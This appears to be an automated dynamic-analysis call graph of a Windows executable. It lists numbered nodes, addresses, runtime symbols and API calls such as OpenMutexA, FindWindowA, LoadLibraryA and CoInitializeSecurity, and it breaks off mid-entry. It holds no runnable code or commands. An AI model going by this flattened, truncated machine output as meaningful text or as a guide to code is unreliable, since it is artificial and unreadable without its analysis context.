1108972f 99538->99539 99570 11013830 22 API calls 2 library calls 99539->99570 99541 1108974a 99541->99541 99542 11143230 std::_Mutex::_Mutex 8 API calls 99541->99542 99545 1108978a std::ios_base::_Ios_base_dtor 99542->99545 99543 110897a5 99544 11163db7 std::_Mutex::_Mutex 102 API calls 99543->99544 99547 110897c3 std::_Mutex::_Mutex 99543->99547 99544->99547 99545->99543 99546 11142290 std::_Mutex::_Mutex 265 API calls 99545->99546 99546->99543 99549 1102a620 std::_Mutex::_Mutex 145 API calls 99547->99549 99560 11089874 std::ios_base::_Ios_base_dtor 99547->99560 99548 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99550 11089962 99548->99550 99551 11089813 99549->99551 99550->99522 99552 11142290 std::_Mutex::_Mutex 265 API calls 99551->99552 99553 1108981b 99552->99553 99554 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 99553->99554 99555 11089832 99554->99555 99556 11081bb0 86 API calls 99555->99556 99555->99560 99557 1108984a 99556->99557 99558 1108988e 99557->99558 99559 11089851 99557->99559 99562 11081bb0 86 API calls 99558->99562 99571 110b75d0 99559->99571 99560->99548 99564 11089899 99562->99564 99564->99560 99566 110b75d0 68 API calls 99564->99566 99565 110b75d0 68 API calls 99565->99560 99567 110898a6 99566->99567 99567->99560 99568 110b75d0 68 API calls 99567->99568 99568->99560 99569->99530 99570->99541 99574 110b75b0 99571->99574 99577 111672e3 99574->99577 99580 11167264 99577->99580 99581 11167271 99580->99581 99582 1116728b 99580->99582 99598 11169302 66 API calls __getptd_noexit 99581->99598 99582->99581 99584 11167294 GetFileAttributesA 99582->99584 99586 111672a2 GetLastError 99584->99586 99592 111672b8 99584->99592 99585 11167276 99599 111692ef 66 API calls __getptd_noexit 99585->99599 99601 11169315 66 API calls 3 library calls 99586->99601 99587 11089857 99587->99560 99587->99565 99590 111672ae 99602 111692ef 66 API calls __getptd_noexit 99590->99602 99591 1116727d 99600 1116df04 11 API calls __lseeki64 99591->99600 99592->99587 99603 11169302 66 API calls __getptd_noexit 99592->99603 99596 111672cb 99604 111692ef 66 API calls __getptd_noexit 99596->99604 99598->99585 99599->99591 99600->99587 99601->99590 99602->99587 99603->99596 99604->99590 99605 110173f0 GetTickCount 99612 11017300 99605->99612 99610 11146450 std::_Mutex::_Mutex 21 API calls 99611 11017437 99610->99611 99613 11017320 99612->99613 99614 110173d6 99612->99614 99615 11017342 CoInitialize _GetRawWMIStringW 99613->99615 99618 11017339 WaitForSingleObject 99613->99618 99616 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99614->99616 99619 110173c2 99615->99619 99621 11017375 99615->99621 99617 110173e5 99616->99617 99625 11017220 99617->99625 99618->99615 99619->99614 99620 110173d0 CoUninitialize 99619->99620 99620->99614 99621->99619 99622 110173bc 99621->99622 99624 11163a2d std::_Mutex::_Mutex 79 API calls 99621->99624 99638 11163837 67 API calls __fassign 99622->99638 99624->99621 99626 11017240 99625->99626 99632 110172e6 99625->99632 99627 11017258 CoInitialize _GetRawWMIStringW 99626->99627 99630 1101724f WaitForSingleObject 99626->99630 99633 1101728b 99627->99633 99634 110172d2 99627->99634 99628 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99629 110172f5 SetEvent GetTickCount 99628->99629 99629->99610 99630->99627 99631 110172e0 CoUninitialize 99631->99632 99632->99628 99633->99634 99635 110172cc 99633->99635 99637 11163a2d std::_Mutex::_Mutex 79 API calls 99633->99637 99634->99631 99634->99632 99639 11163837 67 API calls __fassign 99635->99639 99637->99633 99638->99619 99639->99634 99640 11025cd0 LoadLibraryA 99641 1113cd60 99642 1113cd69 99641->99642 99643 1113cd6e 99641->99643 99645 11139090 99642->99645 99646 111390d2 99645->99646 99647 111390c7 GetCurrentThreadId 99645->99647 99648 111390e0 99646->99648 99779 11029330 99646->99779 99647->99646 99786 11133920 99648->99786 99654 111391d1 99660 11139202 FindWindowA 99654->99660 99664 1113929a 99654->99664 99655 1113975a 99656 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99655->99656 99658 11139772 99656->99658 99658->99643 99659 1113911c IsWindow IsWindowVisible 99661 11146450 std::_Mutex::_Mutex 21 API calls 99659->99661 99662 11139217 IsWindowVisible 99660->99662 99660->99664 99665 11139147 99661->99665 99663 1113921e 99662->99663 99662->99664 99663->99664 99670 11138c30 392 API calls 99663->99670 99666 1105dd10 79 API calls 99664->99666 99676 111392bf 99664->99676 99668 1105dd10 79 API calls 99665->99668 99690 111392e7 99666->99690 99667 11139470 99669 1113948a 99667->99669 99673 11138c30 392 API calls 99667->99673 99672 11139163 IsWindowVisible 99668->99672 99675 111394a7 99669->99675 100022 1106b860 298 API calls 99669->100022 99674 1113923f IsWindowVisible 99670->99674 99671 1105dd10 79 API calls 99677 1113945f 99671->99677 99672->99654 99678 11139171 99672->99678 99673->99669 99674->99664 99679 1113924e IsIconic 99674->99679 100023 1112ce90 12 API calls 2 library calls 99675->100023 99676->99667 99676->99671 99677->99667 99682 11139464 99677->99682 99678->99654 99683 11139179 99678->99683 99679->99664 99685 1113925f GetForegroundWindow 99679->99685 100021 1102cff0 294 API calls std::_Mutex::_Mutex 99682->100021 99684 11146450 std::_Mutex::_Mutex 21 API calls 99683->99684 99688 11139183 GetForegroundWindow 99684->99688 100019 11131210 147 API calls 99685->100019 99686 111394ac 99692 111394b4 99686->99692 99693 111394bd 99686->99693 99695 11139192 EnableWindow 99688->99695 99696 111391be 99688->99696 99690->99676 99691 11139334 99690->99691 99698 11081a70 IsDBCSLeadByte 99690->99698 99700 11143230 std::_Mutex::_Mutex 8 API calls 99691->99700 100024 11131b00 89 API calls 2 library calls 99692->100024 99701 111394d4 99693->99701 99702 111394c8 99693->99702 99694 1113946b 99694->99667 100017 11131210 147 API calls 99695->100017 99696->99654 99712 111391ca SetForegroundWindow 99696->99712 99697 1113926e 100020 11131210 147 API calls 99697->100020 99698->99691 99707 11139346 99700->99707 100026 111317a0 299 API calls std::_Mutex::_Mutex 99701->100026 99708 111394d9 99702->99708 100025 11131870 299 API calls std::_Mutex::_Mutex 99702->100025 99706 111394ba 99706->99693 99714 11139353 GetLastError 99707->99714 99727 11139361 99707->99727 99710 111394d2 99708->99710 99711 111395e9 99708->99711 99709 111391a9 100018 11131210 147 API calls 99709->100018 99710->99708 99718 111394f1 99710->99718 99719 1113959b 99710->99719 99720 111386b0 295 API calls 99711->99720 99712->99654 99713 11139275 99721 1113928b EnableWindow 99713->99721 99723 11139284 SetForegroundWindow 99713->99723 99716 11146450 std::_Mutex::_Mutex 21 API calls 99714->99716 99716->99727 99718->99711 99729 1110f420 std::_Mutex::_Mutex 265 API calls 99718->99729 99719->99711 100034 1103f000 68 API calls 99719->100034 99739 111395ee 99720->99739 99721->99664 99722 111391b0 EnableWindow 99722->99696 99723->99721 99724 11139615 99726 1113973a std::ios_base::_Ios_base_dtor 99724->99726 99736 1105dd10 79 API calls 99724->99736 99726->99655 99727->99676 99728 111393b2 99727->99728 99732 11081a70 IsDBCSLeadByte 99727->99732 99734 11143230 std::_Mutex::_Mutex 8 API calls 99728->99734 99733 11139512 99729->99733 99730 111395aa 100035 1103f040 68 API calls 99730->100035 99732->99728 99737 11139533 99733->99737 100027 110573b0 308 API calls std::_Mutex::_Mutex 99733->100027 99738 111393c4 99734->99738 99735 111395b5 100036 1103f060 68 API calls 99735->100036 99753 11139645 99736->99753 100028 1110f260 InterlockedIncrement 99737->100028 99738->99676 99742 111393cb GetLastError 99738->99742 99739->99724 99933 11142210 99739->99933 99745 11146450 std::_Mutex::_Mutex 21 API calls 99742->99745 99744 111395c0 100037 1103f020 68 API calls 99744->100037 99745->99676 99747 11139558 100029 1104ce00 893 API calls 99747->100029 99750 111395cb 100038 1110f270 InterlockedDecrement 99750->100038 99751 11139563 100030 1104e340 893 API calls 99751->100030 99753->99726 99754 1113968d 99753->99754 99757 1113966a 99753->99757 99758 11139699 GetTickCount 99753->99758 99754->99726 99754->99758 99756 11139599 99756->99711 99760 11146450 std::_Mutex::_Mutex 21 API calls 99757->99760 99758->99726 99761 111396ab 99758->99761 99759 1113956e 100031 1104e3b0 893 API calls 99759->100031 99763 11139675 GetTickCount 99760->99763 99764 11142e80 145 API calls 99761->99764 99763->99726 99765 111396b7 99764->99765 99767 11146ee0 269 API calls 99765->99767 99766 11139579 100032 1104ce40 893 API calls 99766->100032 99769 111396c2 99767->99769 99771 11142e80 145 API calls 99769->99771 99770 11139584 99770->99711 100033 110ebf30 285 API calls 99770->100033 99772 111396d5 99771->99772 100039 11025bb0 LoadLibraryA 99772->100039 99775 111396e2 99775->99775 100040 1112c7a0 GetProcAddress SetLastError 99775->100040 99777 11139729 99777->99726 99778 11139733 FreeLibrary 99777->99778 99778->99726 100041 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 99779->100041 99781 1102933e 99782 11029353 99781->99782 100042 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 99781->100042 100043 11089cc0 269 API calls 2 library calls 99782->100043 99785 1102935e 99785->99648 99787 11133962 99786->99787 99788 11133c84 99786->99788 99790 1105dd10 79 API calls 99787->99790 99789 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99788->99789 99791 11133c9c 99789->99791 99792 11133982 99790->99792 99834 11133400 99791->99834 99792->99788 99793 1113398a GetLocalTime 99792->99793 99794 111339c1 LoadLibraryA 99793->99794 99795 111339a0 99793->99795 100044 110098c0 LoadLibraryA 99794->100044 99797 11146450 std::_Mutex::_Mutex 21 API calls 99795->99797 99799 111339b5 99797->99799 99798 11133a15 100045 11015c30 LoadLibraryA 99798->100045 99799->99794 99801 11133a20 GetCurrentProcess 99802 11133a45 GetProcAddress 99801->99802 99803 11133a5d GetProcessHandleCount 99801->99803 99802->99803 99804 11133a66 SetLastError 99802->99804 99805 11133a6e 99803->99805 99804->99805 99806 11133a92 99805->99806 99807 11133a78 GetProcAddress 99805->99807 99809 11133aa0 GetProcAddress 99806->99809 99810 11133aba 99806->99810 99807->99806 99808 11133ac7 SetLastError 99807->99808 99808->99809 99809->99810 99811 11133ad4 SetLastError 99809->99811 99812 11133adf GetProcAddress 99810->99812 99811->99812 99813 11133af1 K32GetProcessMemoryInfo 99812->99813 99814 11133aff SetLastError 99812->99814 99815 11133b07 99813->99815 99814->99815 99816 11146450 std::_Mutex::_Mutex 21 API calls 99815->99816 99818 11133b7d 99815->99818 99816->99818 99817 11133c5a 99819 11133c6a FreeLibrary 99817->99819 99820 11133c6d 99817->99820 99818->99817 99824 1105dd10 79 API calls 99818->99824 99819->99820 99821 11133c77 FreeLibrary 99820->99821 99822 11133c7a 99820->99822 99821->99822 99822->99788 99823 11133c81 FreeLibrary 99822->99823 99823->99788 99825 11133bce 99824->99825 99826 1105dd10 79 API calls 99825->99826 99827 11133bf6 99826->99827 99828 1105dd10 79 API calls 99827->99828 99829 11133c1d 99828->99829 99830 1105dd10 79 API calls 99829->99830 99831 11133c44 99830->99831 99831->99817 99832 11133c55 99831->99832 100046 11027780 265 API calls 2 library calls 99832->100046 99836 1113342d 99834->99836 99835 111338e9 99835->99654 99835->99655 99937 11138c30 99835->99937 99836->99835 99837 110d1550 268 API calls 99836->99837 99838 1113348e 99837->99838 99839 110d1550 268 API calls 99838->99839 99840 11133499 99839->99840 99841 111334c7 99840->99841 99842 111334de 99840->99842 100047 11029450 265 API calls 2 library calls 99841->100047 99844 11146450 std::_Mutex::_Mutex 21 API calls 99842->99844 99845 111334ec 99844->99845 100048 110d12e0 265 API calls 99845->100048 99934 1114222f 99933->99934 99935 1114221a 99933->99935 99934->99724 100049 11141890 99935->100049 99940 11138c4d 99937->99940 99995 1113906f 99937->99995 99938 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99939 1113907e 99938->99939 99939->99659 99941 111450a0 std::_Mutex::_Mutex 90 API calls 99940->99941 99940->99995 99942 11138c8c 99941->99942 99943 1105dd10 79 API calls 99942->99943 99942->99995 99944 11138cbb 99943->99944 100185 1112c920 99944->100185 99946 11138e00 PostMessageA 99948 11138e15 99946->99948 99947 1105dd10 79 API calls 99949 11138dfc 99947->99949 99950 11138e25 99948->99950 100194 1110f270 InterlockedDecrement 99948->100194 99949->99946 99949->99948 99952 11138e2b 99950->99952 99953 11138e4d 99950->99953 99955 11138e83 std::ios_base::_Ios_base_dtor 99952->99955 99956 11138e9e 99952->99956 100195 11130410 315 API calls std::_Mutex::_Mutex 99953->100195 99964 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99955->99964 99958 11142e80 145 API calls 99956->99958 99957 11138e55 100196 11146ec0 267 API calls 99957->100196 99962 11138ea3 99958->99962 99961 11138e5f 100197 1112cb20 SetDlgItemTextA 99961->100197 99965 11146ee0 269 API calls 99962->99965 99967 11138e9a 99964->99967 99968 11138eaa SetWindowTextA 99965->99968 99966 11138e70 std::ios_base::_Ios_base_dtor 99966->99952 99967->99659 99969 11138ec6 99968->99969 99977 11138ecd std::ios_base::_Ios_base_dtor 99968->99977 100198 111352b0 299 API calls 5 library calls 99969->100198 99970 11145b40 271 API calls 99972 11138dab 99970->99972 99972->99946 99972->99947 99973 11138f24 99974 11138f38 99973->99974 99975 11138ffc 99973->99975 99978 11138f5c 99974->99978 100201 111352b0 299 API calls 5 library calls 99974->100201 99981 1113901d 99975->99981 99984 1113900b 99975->99984 99985 11139004 99975->99985 99976 11138ef7 99976->99973 99980 11138f0c 99976->99980 99977->99973 99977->99976 100199 111352b0 299 API calls 5 library calls 99977->100199 100203 110f8640 86 API calls 99978->100203 100200 11131210 147 API calls 99980->100200 100207 110f8640 86 API calls 99981->100207 100206 11131210 147 API calls 99984->100206 100205 111352b0 299 API calls 5 library calls 99985->100205 99989 11139028 99989->99995 99996 1113902c IsWindowVisible 99989->99996 99990 11138f67 99990->99995 99997 11138f6f IsWindowVisible 99990->99997 99991 11138f1c 99991->99973 99993 1113901a 99993->99981 99994 11138f46 99994->99978 99998 11138f52 99994->99998 99995->99938 99996->99995 99999 1113903e IsWindowVisible 99996->99999 99997->99995 100000 11138f86 99997->100000 100202 11131210 147 API calls 99998->100202 99999->99995 100002 1113904b EnableWindow 99999->100002 100003 111450a0 std::_Mutex::_Mutex 90 API calls 100000->100003 100208 11131210 147 API calls 100002->100208 100004 11138f91 100003->100004 100004->99995 100007 11138f9c GetForegroundWindow IsWindowVisible 100004->100007 100005 11138f59 100005->99978 100009 11138fc1 100007->100009 100010 11138fb6 EnableWindow 100007->100010 100008 11139062 EnableWindow 100008->99995 100204 11131210 147 API calls 100009->100204 100010->100009 100012 11138fc8 100013 11138fde EnableWindow 100012->100013 100014 11138fd7 SetForegroundWindow 100012->100014 100015 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 100013->100015 100014->100013 100016 11138ff8 100015->100016 100016->99659 100017->99709 100018->99722 100019->99697 100020->99713 100021->99694 100022->99675 100023->99686 100024->99706 100025->99710 100026->99708 100027->99737 100028->99747 100029->99751 100030->99759 100031->99766 100032->99770 100033->99756 100034->99730 100035->99735 100036->99744 100037->99750 100038->99756 100039->99775 100040->99777 100041->99781 100042->99781 100043->99785 100044->99798 100045->99801 100046->99817 100050 111418cf 100049->100050 100100 111418c8 std::ios_base::_Ios_base_dtor 100049->100100 100051 1110f420 std::_Mutex::_Mutex 265 API calls 100050->100051 100053 111418d6 100051->100053 100052 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 100054 1114220a 100052->100054 100055 11141906 100053->100055 100176 11060f70 301 API calls std::_Mutex::_Mutex 100053->100176 100054->99934 100057 11061700 275 API calls 100055->100057 100058 11141942 100057->100058 100059 11141949 RegCloseKey 100058->100059 100060 11141950 std::_Mutex::_Mutex 100058->100060 100059->100060 100061 11144dc0 267 API calls 100060->100061 100062 1114196c 100061->100062 100063 11143230 std::_Mutex::_Mutex 8 API calls 100062->100063 100064 11141980 100063->100064 100065 11141997 100064->100065 100066 11062d60 330 API calls 100064->100066 100067 1110f420 std::_Mutex::_Mutex 265 API calls 100065->100067 100066->100065 100068 1114199e 100067->100068 100069 111419ba 100068->100069 100177 11060be0 293 API calls std::_Mutex::_Mutex 100068->100177 100071 1110f420 std::_Mutex::_Mutex 265 API calls 100069->100071 100072 111419d3 100071->100072 100073 111419ef 100072->100073 100178 11060be0 293 API calls std::_Mutex::_Mutex 100072->100178 100075 1110f420 std::_Mutex::_Mutex 265 API calls 100073->100075 100076 11141a08 100075->100076 100077 11141a24 100076->100077 100179 11060be0 293 API calls std::_Mutex::_Mutex 100076->100179 100079 11060760 268 API calls 100077->100079 100080 11141a4d 100079->100080 100081 11060760 268 API calls 100080->100081 100117 11141a67 100081->100117 100082 11141d95 100084 110d1550 268 API calls 100082->100084 100086 11142179 100082->100086 100083 110607f0 274 API calls 100083->100117 100085 11141db3 100084->100085 100091 1105dd10 79 API calls 100085->100091 100093 11060640 69 API calls 100086->100093 100087 11141d85 100090 11146450 std::_Mutex::_Mutex 21 API calls 100087->100090 100088 11081bb0 86 API calls 100088->100117 100089 11146450 21 API calls std::_Mutex::_Mutex 100089->100117 100090->100082 100092 11141df0 100091->100092 100094 11141f3d 100092->100094 100096 11060760 268 API calls 100092->100096 100095 111421d2 100093->100095 100098 11060f40 274 API calls 100094->100098 100097 11060640 69 API calls 100095->100097 100099 11141e0e 100096->100099 100097->100100 100101 11141f59 100098->100101 100102 110607f0 274 API calls 100099->100102 100100->100052 100180 110679c0 298 API calls std::_Mutex::_Mutex 100101->100180 100110 11141e1d 100102->100110 100104 11141e52 100105 11060760 268 API calls 100104->100105 100108 11141e68 100105->100108 100106 11141f83 100109 11141fb3 EnterCriticalSection 100106->100109 100119 11141f87 100106->100119 100107 11146450 std::_Mutex::_Mutex 21 API calls 100107->100110 100111 110607f0 274 API calls 100108->100111 100113 11060420 271 API calls 100109->100113 100110->100104 100110->100107 100114 110607f0 274 API calls 100110->100114 100130 11141e78 100111->100130 100112 111319f0 86 API calls 100112->100117 100116 11141fd0 100113->100116 100114->100110 100120 11060f40 274 API calls 100116->100120 100117->100082 100117->100083 100117->100087 100117->100088 100117->100089 100117->100112 100124 11081c60 86 API calls std::_Mutex::_Mutex 100117->100124 100118 11141eb1 100121 11060760 268 API calls 100118->100121 100119->100109 100181 110508e0 365 API calls 4 library calls 100119->100181 100182 110679c0 298 API calls std::_Mutex::_Mutex 100119->100182 100122 11141fe6 100120->100122 100126 11141ec7 100121->100126 100123 11141ffa LeaveCriticalSection 100122->100123 100127 1102a9f0 283 API calls 100122->100127 100128 1114204e 100123->100128 100129 1114200e 100123->100129 100124->100117 100125 11146450 std::_Mutex::_Mutex 21 API calls 100125->100130 100132 110607f0 274 API calls 100126->100132 100133 11141ff7 100127->100133 100134 11133400 273 API calls 100128->100134 100129->100128 100137 11146450 std::_Mutex::_Mutex 21 API calls 100129->100137 100130->100118 100130->100125 100135 110607f0 274 API calls 100130->100135 100146 11141ed6 100132->100146 100133->100123 100136 11142058 100134->100136 100135->100130 100139 110d1550 268 API calls 100136->100139 100141 1114201c 100137->100141 100138 11141f11 100140 11060640 69 API calls 100138->100140 100143 11142066 100139->100143 100144 11141f1f 100140->100144 100145 1113cc30 311 API calls 100141->100145 100142 11146450 std::_Mutex::_Mutex 21 API calls 100142->100146 100183 110cff20 265 API calls std::_Mutex::_Mutex 100143->100183 100147 11060640 69 API calls 100144->100147 100148 11142021 100145->100148 100146->100138 100146->100142 100149 110607f0 274 API calls 100146->100149 100150 11141f2e 100147->100150 100151 111414a0 1597 API calls 100148->100151 100149->100146 100153 11060640 69 API calls 100150->100153 100154 11142027 100151->100154 100153->100094 100154->100128 100156 11146450 std::_Mutex::_Mutex 21 API calls 100154->100156 100155 1114209c 100170 1114211f 100155->100170 100184 110d12e0 265 API calls 100155->100184 100159 11142040 100156->100159 100157 110d07c0 265 API calls 100160 1114215b 100157->100160 100162 11026ba0 848 API calls 100159->100162 100163 110d07c0 265 API calls 100160->100163 100162->100128 100163->100086 100170->100157 100176->100055 100177->100069 100178->100073 100179->100077 100180->100106 100181->100119 100182->100119 100183->100155 100186 1112c93c 100185->100186 100187 1112c977 100186->100187 100188 1112c964 100186->100188 100209 1106b860 298 API calls 100187->100209 100190 11146ee0 269 API calls 100188->100190 100191 1112c96f 100190->100191 100192 1112c9c3 100191->100192 100193 11142290 std::_Mutex::_Mutex 265 API calls 100191->100193 100192->99970 100192->99972 100193->100192 100194->99950 100195->99957 100196->99961 100197->99966 100198->99977 100199->99976 100200->99991 100201->99994 100202->100005 100203->99990 100204->100012 100205->99984 100206->99993 100207->99989 100208->100008 100209->100191 100210 11144200 100211 11144211 100210->100211 100224 11143c20 100211->100224 100215 1114425b 100216 11144262 ResetEvent 100215->100216 100232 11143de0 265 API calls 2 library calls 100216->100232 100217 111442b2 100218 11144295 100218->100217 100220 11144294 100218->100220 100220->100218 100233 11143de0 265 API calls 2 library calls 100220->100233 100221 11144276 SetEvent WaitForMultipleObjects 100221->100216 100221->100220 100223 111442af 100223->100217 100225 11143c2c GetCurrentProcess 100224->100225 100226 11143c4f 100224->100226 100225->100226 100227 11143c3d GetModuleFileNameA 100225->100227 100228 11143c79 WaitForMultipleObjects 100226->100228 100229 1110f420 std::_Mutex::_Mutex 263 API calls 100226->100229 100227->100226 100228->100215 100228->100218 100230 11143c6b 100229->100230 100230->100228 100234 11143570 GetModuleFileNameA 100230->100234 100232->100221 100233->100223 100235 111435f3 100234->100235 100236 111435b3 100234->100236 100238 111435ff LoadLibraryA 100235->100238 100239 11143619 GetModuleHandleA GetProcAddress 100235->100239 100237 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 100236->100237 100240 111435c1 100237->100240 100238->100239 100241 1114360e LoadLibraryA 100238->100241 100242 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 100239->100242 100243 11143639 100239->100243 100240->100235 100244 111435c8 LoadLibraryA 100240->100244 100241->100239 100245 11143673 10 API calls 100242->100245 100243->100245 100244->100235 100246 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 100245->100246 100247 111436f0 100246->100247 100247->100228 100248 1115bde0 100249 1115bdf4 100248->100249 100250 1115bdec 100248->100250 100260 111631ab 100249->100260 100253 1115be14 100255 11162be5 _free 66 API calls 100256 1115bf68 100255->100256 100257 1115bf40 100257->100255 100258 1115bf24 SetLastError 100259 1115be31 100258->100259 100259->100257 100259->100258 100259->100259 100261 11170166 _calloc 66 API calls 100260->100261 100262 111631c5 100261->100262 100263 1115be08 100262->100263 100284 111692ef 66 API calls __getptd_noexit 100262->100284 100263->100253 100263->100257 100267 1115ba20 CoInitializeSecurity CoCreateInstance 100263->100267 100265 111631d8 100265->100263 100285 111692ef 66 API calls __getptd_noexit 100265->100285 100268 1115ba95 wsprintfW SysAllocString 100267->100268 100269 1115bc14 100267->100269 100274 1115badb 100268->100274 100270 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 100269->100270 100272 1115bc40 100270->100272 100271 1115bc01 SysFreeString 100271->100269 100272->100259 100273 1115bbe9 100273->100271 100274->100271 100274->100273 100274->100274 100275 1115bb6c 100274->100275 100276 1115bb5a wsprintfW 100274->100276 100286 110974a0 100275->100286 100276->100275 100278 1115bb7e 100279 110974a0 266 API calls 100278->100279 100280 1115bb93 100279->100280 100291 11097550 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 100280->100291 100282 1115bbd7 100292 11097550 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 100282->100292 100284->100265 100285->100263 100287 1110f420 std::_Mutex::_Mutex 265 API calls 100286->100287 100288 110974d3 100287->100288 100289 110974e6 SysAllocString 100288->100289 100290 11097504 100288->100290 100289->100290 100290->100278 100291->100282 100292->100273 100293 6c5f5ae6 100294 6c5f5af6 100293->100294 100295 6c5f5af1 100293->100295 100299 6c5f59f0 100294->100299 100307 6c5ff28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 100295->100307 100298 6c5f5b04 100300 6c5f59fc _flsall 100299->100300 100304 6c5f5a49 ___DllMainCRTStartup 100300->100304 100305 6c5f5a99 _flsall 100300->100305 100308 6c5f588c 100300->100308 100302 6c5f5a79 100303 6c5f588c __CRT_INIT@12 145 API calls 100302->100303 100302->100305 100303->100305 100304->100302 100304->100305 100306 6c5f588c __CRT_INIT@12 145 API calls 100304->100306 100305->100298 100306->100302 100307->100294 100309 6c5f5898 _flsall 100308->100309 100310 6c5f591a 100309->100310 100311 6c5f58a0 100309->100311 100313 6c5f597b 100310->100313 100314 6c5f5920 100310->100314 100358 6c5f607f HeapCreate 100311->100358 100315 6c5f59d9 100313->100315 100316 6c5f5980 100313->100316 100320 6c5f593e 100314->100320 100327 6c5f58a9 _flsall 100314->100327 100368 6c5f5e35 61 API calls _doexit 100314->100368 100315->100327 100375 6c5f70ad 74 API calls __freefls@4 100315->100375 100373 6c5f6da9 TlsGetValue DecodePointer TlsSetValue 100316->100373 100317 6c5f58a5 100319 6c5f58b0 100317->100319 100317->100327 100359 6c5f7127 80 API calls 3 library calls 100319->100359 100324 6c5f5952 100320->100324 100369 6c5f9b09 62 API calls _free 100320->100369 100321 6c5f5985 __calloc_crt 100326 6c5f599d DecodePointer 100321->100326 100321->100327 100372 6c5f5965 65 API calls __mtterm 100324->100372 100333 6c5f59b2 100326->100333 100327->100304 100328 6c5f58b5 __RTC_Initialize 100331 6c5f58b9 100328->100331 100340 6c5f58c5 GetCommandLineA 100328->100340 100360 6c5f609d HeapDestroy 100331->100360 100332 6c5f5948 100370 6c5f6dfa 65 API calls _free 100332->100370 100336 6c5f59cd 100333->100336 100337 6c5f59b6 100333->100337 100342 6c5f1bfd _free 61 API calls 100336->100342 100374 6c5f6e37 61 API calls 4 library calls 100337->100374 100338 6c5f58be 100338->100327 100339 6c5f594d 100371 6c5f609d HeapDestroy 100339->100371 100361 6c5ff016 67 API calls _free 100340->100361 100342->100327 100345 6c5f59bd GetCurrentThreadId 100345->100327 100346 6c5f58d5 100362 6c5f98c4 9 API calls 100346->100362 100348 6c5f58df 100349 6c5f58e3 100348->100349 100364 6c5fef5b 84 API calls 2 library calls 100348->100364 100363 6c5f6dfa 65 API calls _free 100349->100363 100352 6c5f58ef 100353 6c5f5903 100352->100353 100365 6c5fecd4 84 API calls 5 library calls 100352->100365 100353->100338 100367 6c5f9b09 62 API calls _free 100353->100367 100356 6c5f58f8 100356->100353 100366 6c5f5c32 74 API calls 4 library calls 100356->100366 100358->100317 100359->100328 100360->100338 100361->100346 100362->100348 100363->100331 100364->100352 100365->100356 100366->100353 100367->100349 100368->100320 100369->100332 100370->100339 100371->100324 100372->100327 100373->100321 100374->100345 100375->100327 100376 110304b8 100377 11142a60 267 API calls 100376->100377 100378 110304c6 100377->100378 100379 11142bb0 86 API calls 100378->100379 100380 11030503 100379->100380 100381 11030518 100380->100381 100382 11081bb0 86 API calls 100380->100382 100383 110ed1a0 8 API calls 100381->100383 100382->100381 100384 1103053f 100383->100384 100385 11030589 100384->100385 100448 110ed250 81 API calls 2 library calls 100384->100448 100388 11142bb0 86 API calls 100385->100388 100387 11030554 100449 110ed250 81 API calls 2 library calls 100387->100449 100390 110305a0 100388->100390 100393 1110f420 std::_Mutex::_Mutex 265 API calls 100390->100393 100391 1103056b 100391->100385 100392 111463d0 19 API calls 100391->100392 100392->100385 100394 110305af 100393->100394 100395 110305d0 100394->100395 100450 11088860 268 API calls 100394->100450 100427 1108a470 100395->100427 100398 110305e3 OpenMutexA 100399 11030603 CreateMutexA 100398->100399 100400 1103071a CloseHandle 100398->100400 100401 11030623 100399->100401 100402 1108a570 69 API calls 100400->100402 100403 1110f420 std::_Mutex::_Mutex 265 API calls 100401->100403 100405 11030730 100402->100405 100404 11030638 100403->100404 100406 1103065b 100404->100406 100451 11060be0 293 API calls std::_Mutex::_Mutex 100404->100451 100408 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 100405->100408 100438 11015c30 LoadLibraryA 100406->100438 100410 110310b3 100408->100410 100411 1103066d 100412 111450a0 std::_Mutex::_Mutex 90 API calls 100411->100412 100413 1103067c 100412->100413 100414 11030689 100413->100414 100415 1103069c 100413->100415 100439 11145ae0 100414->100439 100417 110306a6 GetProcAddress 100415->100417 100418 11030690 100415->100418 100417->100418 100419 110306c0 SetLastError 100417->100419 100420 110281a0 47 API calls 100418->100420 100419->100418 100421 110306cd 100420->100421 100452 110092f0 429 API calls std::_Mutex::_Mutex 100421->100452 100423 110306dc 100424 110306f0 WaitForSingleObject 100423->100424 100424->100424 100425 11030702 CloseHandle 100424->100425 100425->100400 100426 11030713 FreeLibrary 100425->100426 100426->100400 100428 1110f420 std::_Mutex::_Mutex 265 API calls 100427->100428 100429 1108a4a7 100428->100429 100430 1110f420 std::_Mutex::_Mutex 265 API calls 100429->100430 100434 1108a4c9 InitializeCriticalSection 100429->100434 100432 1108a4c2 100430->100432 100432->100434 100453 1116219a 66 API calls std::exception::_Copy_str 100432->100453 100433 1108a52a 100433->100398 100434->100433 100436 1108a4f9 100454 111625f1 RaiseException 100436->100454 100438->100411 100440 111450a0 